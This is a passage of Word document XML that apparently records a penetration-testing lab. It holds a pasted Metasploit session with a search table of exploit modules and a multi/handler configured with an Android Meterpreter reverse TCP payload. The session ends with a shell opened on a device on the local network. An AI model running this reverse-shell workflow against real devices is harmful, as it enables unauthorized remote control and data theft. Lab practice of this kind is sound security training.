    <w:p w14:paraId="47CC564E" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0517BA8B" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9"/>
    <w:p w14:paraId="7A5C0F8E" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">   #  Name                                               Disclosure Date  Rank       Check  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CDA91B" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">   -  ----                                               ---------------  ----       -----  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DD47A7" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">   0  exploit/android/local/janus                        2017-07-31       manual     Yes    Android Janus APK Signature bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78129925" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">   1  auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8A2B94" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">   2  exploit/linux/local/desktop_privilege_escalation   2014-08-07       excellent  Yes    Desktop Linux Password Stealer and Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB6D8CE" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">   3    \_ target: Linux x86                             .                .          .      .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A84369" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">   4    \_ target: Linux x86_64                          .                .          .      .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222ECE31" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">   5  exploit/multi/handler                              .                manual     No     Generic Payload Handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A8E65E" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">   6  exploit/windows/mssql/mssql_linkcrawler            2000-01-01       great      No     Microsoft SQL Server Database Link Crawling Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029AA9AD" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">   7  exploit/windows/browser/persits_xupload_traversal  2009-09-29       excellent  No     Persits XUpload ActiveX MakeHttpRequest Directory Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026BF957" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9"/>
    <w:p w14:paraId="03492786" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9"/>
    <w:p w14:paraId="287DEA89" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>Interact with a module by name or index. For example info 7, use 7 or use exploit/windows/browser/persits_xupload_traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019B5817" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9"/>
    <w:p w14:paraId="3F8F1E3E" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>msf &gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70881557" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>[*] Using configured payload generic/shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA78C03" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; set payload android/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B32E06" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>payload =&gt; android/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F97B56" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; set LHOST 192.168.88.213</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FD864E" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>LHOST =&gt; 192.168.88.213</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0316461E" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>msf exploit(multi/handler) &gt; set LPORT 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088C900B" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>LPORT =&gt; 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137EB0BF" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4F4313" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.88.213:2222 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CD2D98" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>[*] Sending stage (72508 bytes) to 192.168.88.223</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775B01D9" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>[*] Meterpreter session 1 opened (192.168.88.213:2222 -&gt; 192.168.88.223:48135) at 2026-05-14 01:29:53 -0400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7962D5AB" w14:textId="77777777" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9"/>
    <w:p w14:paraId="2F5B9AF8" w14:textId="3BDFCEB1" w:rsidR="00B313C9" w:rsidRDefault="00B313C9" w:rsidP="00B313C9">
      <w:r>
        <w:t>meterpreter &gt;</w:t>
      </w:r>
      <w:r w:rsidR="00D42DA8">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B31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66"/>
    <w:rsid w:val="00920F62"/>
    <w:rsid w:val="00A45366"/>
    <w:rsid w:val="00B313C9"/>
    <w:rsid w:val="00C50AFB"/>
    <w:rsid w:val="00D4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3C2B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C6B53D0A-A428-4BAD-90B9-567A37BA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2026-05-14T05:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-14T05:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>